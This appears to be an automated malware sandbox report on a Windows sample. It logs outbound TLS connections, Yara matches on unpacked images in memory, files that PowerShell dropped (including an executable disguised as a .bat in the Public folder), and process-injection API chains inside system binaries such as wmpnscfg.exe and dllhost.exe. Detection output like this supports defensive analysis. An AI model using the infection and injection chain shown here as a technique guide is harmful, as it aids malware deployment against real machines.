Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.69.42.241:443 -> 192.168.2.7:52142 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:52152 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:52166 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:52174 version: TLS 1.2
Source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_46571554-c
Source: regsvr32.exe, 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_cc88e3cb-2
Source: Yara match File source: 7.3.regsvr32.exe.1c9a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.OpenWith.exe.1bd877d5168.87.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.OpenWith.exe.1bd87b10000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.OpenWith.exe.1bd87830000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.regsvr32.exe.1c6c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.OpenWith.exe.1bd87b10000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.OpenWith.exe.1bd87830000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.regsvr32.exe.1c9a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.1512321032.000001BD87B10000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1511290183.000001BD87830000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1500890614.000000001C6C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1501970483.000000001C9A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: OpenWith.exe PID: 6960, type: MEMORYSTR

System Summary

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Desktop\utox_x86_x64.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Source: C:\Users\user\Desktop\utox_x86_x64.exe Process Stats: CPU usage > 49%
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E947000 NtWriteFile,WaitForSingleObject, 3_2_00007FF79E947000
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E946EE0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError, 3_2_00007FF79E946EE0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C56A8 NtQuerySystemInformation,NtQuerySystemInformation,lstrcmpiW,CloseHandle,free, 7_2_1C0C56A8
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C51B4 NtQueryInformationProcess, 7_2_1C0C51B4
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_3_00007DF423EB1CE8 calloc,CreateProcessW,NtResumeThread,CloseHandle,free, 14_3_00007DF423EB1CE8
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_3_00007DF423EB1958 calloc,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory, 14_3_00007DF423EB1958
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D27B8 NtAcceptConnectPort, 14_2_00000203FE6D27B8
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D288C NtAcceptConnectPort, 14_2_00000203FE6D288C
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D28E8 NtAcceptConnectPort, 14_2_00000203FE6D28E8
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D28B8 NtAcceptConnectPort, 14_2_00000203FE6D28B8
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D2990 NtAcceptConnectPort, 14_2_00000203FE6D2990
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D2418 NtAcceptConnectPort, 14_2_00000203FE6D2418
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D2C64 NtAcceptConnectPort, 14_2_00000203FE6D2C64
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D252C NtAcceptConnectPort, 14_2_00000203FE6D252C
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D29D4 NtAcceptConnectPort, 14_2_00000203FE6D29D4
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00007DF423EB1E64 CreateProcessW,NtResumeThread,CloseHandle, 14_2_00007DF423EB1E64
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00007DF423EB199C calloc,NtQueryInformationProcess,NtReadVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory, 14_2_00007DF423EB199C
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00007DF423EC2704 NtQuerySystemInformation,free,malloc,NtQuerySystemInformation, 14_2_00007DF423EC2704
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF1385C NtQuerySystemInformation, 15_2_000002913DF1385C
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5A288C NtAcceptConnectPort, 16_2_00000260AF5A288C
Source: C:\Windows\System32\rekeywiz.exe Code function: 16_2_00000260AF5A2688 NtAcceptConnectPort, 16_2_00000260AF5A2688
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E946190: memcpy,DeviceIoControl,CloseHandle,CloseHandle,GetLastError, 3_2_00007FF79E946190
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E94B630 3_2_00007FF79E94B630
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9494D0 3_2_00007FF79E9494D0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8F2FE9 3_2_00007FF79E8F2FE9
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E942E70 3_2_00007FF79E942E70
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E923FB7 3_2_00007FF79E923FB7
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9A7FA0 3_2_00007FF79E9A7FA0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97FFF0 3_2_00007FF79E97FFF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E99BF20 3_2_00007FF79E99BF20
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8FFF83 3_2_00007FF79E8FFF83
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9A40C0 3_2_00007FF79E9A40C0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E98A0E0 3_2_00007FF79E98A0E0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E982030 3_2_00007FF79E982030
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E923DD0 3_2_00007FF79E923DD0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97FE00 3_2_00007FF79E97FE00
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E969E0B 3_2_00007FF79E969E0B
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E99BDE0 3_2_00007FF79E99BDE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E93FF10 3_2_00007FF79E93FF10
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97DEF0 3_2_00007FF79E97DEF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E999BC0 3_2_00007FF79E999BC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E98DBE0 3_2_00007FF79E98DBE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E963B40 3_2_00007FF79E963B40
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E909B30 3_2_00007FF79E909B30
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E925CC0 3_2_00007FF79E925CC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E93DD00 3_2_00007FF79E93DD00
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9A5CE0 3_2_00007FF79E9A5CE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90DC80 3_2_00007FF79E90DC80
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97B9B0 3_2_00007FF79E97B9B0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E979920 3_2_00007FF79E979920
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E95F960 3_2_00007FF79E95F960
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9A7AC0 3_2_00007FF79E9A7AC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E953AA0 3_2_00007FF79E953AA0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E995B00 3_2_00007FF79E995B00
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E921B00 3_2_00007FF79E921B00
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8F1A31 3_2_00007FF79E8F1A31
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E951A40 3_2_00007FF79E951A40
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E93DA50 3_2_00007FF79E93DA50
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90BA80 3_2_00007FF79E90BA80
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E96B7FD 3_2_00007FF79E96B7FD
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E91B800 3_2_00007FF79E91B800
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8FF7E0 3_2_00007FF79E8FF7E0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E989750 3_2_00007FF79E989750
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E99B720 3_2_00007FF79E99B720
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E98F730 3_2_00007FF79E98F730
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E991780 3_2_00007FF79E991780
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E957770 3_2_00007FF79E957770
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9618A0 3_2_00007FF79E9618A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97F840 3_2_00007FF79E97F840
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E96D887 3_2_00007FF79E96D887
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9695B6 3_2_00007FF79E9695B6
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9215E0 3_2_00007FF79E9215E0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9A15DD 3_2_00007FF79E9A15DD
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9375F0 3_2_00007FF79E9375F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97F5F0 3_2_00007FF79E97F5F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E92D520 3_2_00007FF79E92D520
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E997530 3_2_00007FF79E997530
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97D6A8 3_2_00007FF79E97D6A8
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E901665 3_2_00007FF79E901665
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8F565B 3_2_00007FF79E8F565B
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E96D671 3_2_00007FF79E96D671
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9A5410 3_2_00007FF79E9A5410
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E993350 3_2_00007FF79E993350
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90B350 3_2_00007FF79E90B350
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9A7330 3_2_00007FF79E9A7330
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9634B6 3_2_00007FF79E9634B6
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97F440 3_2_00007FF79E97F440
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90D1D0 3_2_00007FF79E90D1D0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E91B200 3_2_00007FF79E91B200
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E98D160 3_2_00007FF79E98D160
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E947170 3_2_00007FF79E947170
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E913290 3_2_00007FF79E913290
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97CFCB 3_2_00007FF79E97CFCB
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E95D0A0 3_2_00007FF79E95D0A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97F0A0 3_2_00007FF79E97F0A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90F030 3_2_00007FF79E90F030
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E92F060 3_2_00007FF79E92F060
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8FEDB4 3_2_00007FF79E8FEDB4
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E99ADE0 3_2_00007FF79E99ADE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E920D80 3_2_00007FF79E920D80
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E938C00 3_2_00007FF79E938C00
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E994BF0 3_2_00007FF79E994BF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E932B80 3_2_00007FF79E932B80
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E968CAC 3_2_00007FF79E968CAC
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E95ED00 3_2_00007FF79E95ED00
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E990CE0 3_2_00007FF79E990CE0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E998CF0 3_2_00007FF79E998CF0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90AC30 3_2_00007FF79E90AC30
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E99EC60 3_2_00007FF79E99EC60
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E982920 3_2_00007FF79E982920
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E974920 3_2_00007FF79E974920
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E96A990 3_2_00007FF79E96A990
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E934AC0 3_2_00007FF79E934AC0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E992B00 3_2_00007FF79E992B00
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E978A20 3_2_00007FF79E978A20
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9627A4 3_2_00007FF79E9627A4
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9047CD 3_2_00007FF79E9047CD
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E92A740 3_2_00007FF79E92A740
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E994750 3_2_00007FF79E994750
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E910820 3_2_00007FF79E910820
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90C860 3_2_00007FF79E90C860
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E930870 3_2_00007FF79E930870
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E988520 3_2_00007FF79E988520
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E924579 3_2_00007FF79E924579
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9906A0 3_2_00007FF79E9906A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E996710 3_2_00007FF79E996710
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9026E2 3_2_00007FF79E9026E2
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9503A0 3_2_00007FF79E9503A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97C356 3_2_00007FF79E97C356
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E97C358 3_2_00007FF79E97C358
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E98E4C0 3_2_00007FF79E98E4C0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90A4A0 3_2_00007FF79E90A4A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90446C 3_2_00007FF79E90446C
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9841B0 3_2_00007FF79E9841B0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E99C1F0 3_2_00007FF79E99C1F0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E96C120 3_2_00007FF79E96C120
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E91E180 3_2_00007FF79E91E180
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E90C170 3_2_00007FF79E90C170
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E99A2A0 3_2_00007FF79E99A2A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E9382A0 3_2_00007FF79E9382A0
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E96E23A 3_2_00007FF79E96E23A
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E8FE28F 3_2_00007FF79E8FE28F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFAAC454DFA 4_2_00007FFAAC454DFA
Source: C:\Windows\System32\regsvr32.exe Code function: 7_3_02F318D7 7_3_02F318D7
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F318D7 7_2_02F318D7
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F308A4 7_2_02F308A4
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_02F30837 7_2_02F30837
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C4A54 7_2_1C0C4A54
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C870C 7_2_1C0C870C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C710C 7_2_1C0C710C
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C1500 7_2_1C0C1500
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C2F00 7_2_1C0C2F00
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C8A58 7_2_1C0C8A58
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C5BC0 7_2_1C0C5BC0
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C3CEC 7_2_1C0C3CEC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_1C0C9FFC 7_2_1C0C9FFC
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_00007FFAAC44098D 7_2_00007FFAAC44098D
Source: C:\Windows\System32\OpenWith.exe Code function: 11_3_000001BD87841150 11_3_000001BD87841150
Source: C:\Windows\System32\OpenWith.exe Code function: 11_3_000001BD85340967 11_3_000001BD85340967
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_3_00007DF423EB392C 14_3_00007DF423EB392C
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_3_00007DF423EB2204 14_3_00007DF423EB2204
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_3_00007DF423EB4EFC 14_3_00007DF423EB4EFC
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6C2628 14_2_00000203FE6C2628
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D2D24 14_2_00000203FE6D2D24
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6CC25C 14_2_00000203FE6CC25C
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6DD010 14_2_00000203FE6DD010
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6FA81C 14_2_00000203FE6FA81C
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6E7094 14_2_00000203FE6E7094
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE700874 14_2_00000203FE700874
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6ED854 14_2_00000203FE6ED854
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F5918 14_2_00000203FE6F5918
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F48D0 14_2_00000203FE6F48D0
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6FE984 14_2_00000203FE6FE984
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6E0174 14_2_00000203FE6E0174
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6FF940 14_2_00000203FE6FF940
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6DF618 14_2_00000203FE6DF618
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F4DE8 14_2_00000203FE6F4DE8
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F95D4 14_2_00000203FE6F95D4
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F55B0 14_2_00000203FE6F55B0
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6E7684 14_2_00000203FE6E7684
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F5EC8 14_2_00000203FE6F5EC8
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6E3EA4 14_2_00000203FE6E3EA4
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6DBEB8 14_2_00000203FE6DBEB8
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6E86B4 14_2_00000203FE6E86B4
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F3F70 14_2_00000203FE6F3F70
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6DC750 14_2_00000203FE6DC750
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D6F24 14_2_00000203FE6D6F24
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6FCC00 14_2_00000203FE6FCC00
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F0478 14_2_00000203FE6F0478
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE706434 14_2_00000203FE706434
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6E6D18 14_2_00000203FE6E6D18
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6DDCE4 14_2_00000203FE6DDCE4
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6FECE4 14_2_00000203FE6FECE4
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6C14D0 14_2_00000203FE6C14D0
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE700D90 14_2_00000203FE700D90
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6FF1D0 14_2_00000203FE6FF1D0
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D7270 14_2_00000203FE6D7270
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE700270 14_2_00000203FE700270
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F4A50 14_2_00000203FE6F4A50
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE703A4D 14_2_00000203FE703A4D
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6F3A38 14_2_00000203FE6F3A38
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6D5ADC 14_2_00000203FE6D5ADC
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6DE398 14_2_00000203FE6DE398
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00007DF423EB22CC 14_2_00007DF423EB22CC
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF3C668 15_2_000002913DF3C668
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF34660 15_2_000002913DF34660
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF1D604 15_2_000002913DF1D604
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF41E08 15_2_000002913DF41E08
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF2AE10 15_2_000002913DF2AE10
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF18DF4 15_2_000002913DF18DF4
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF1C5D4 15_2_000002913DF1C5D4
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF325B4 15_2_000002913DF325B4
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF29D30 15_2_000002913DF29D30
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF2E51C 15_2_000002913DF2E51C
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF2A4F8 15_2_000002913DF2A4F8
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF3C500 15_2_000002913DF3C500
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF2A860 15_2_000002913DF2A860
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF29818 15_2_000002913DF29818
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF1BFE4 15_2_000002913DF1BFE4
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF227A4 15_2_000002913DF227A4
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF2F76C 15_2_000002913DF2F76C
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF28EB8 15_2_000002913DF28EB8
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF32254 15_2_000002913DF32254
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF33210 15_2_000002913DF33210
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF29998 15_2_000002913DF29998
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF28980 15_2_000002913DF28980
Source: C:\Windows\System32\dllhost.exe Code function: 15_2_000002913DF34144 15_2_000002913DF34144
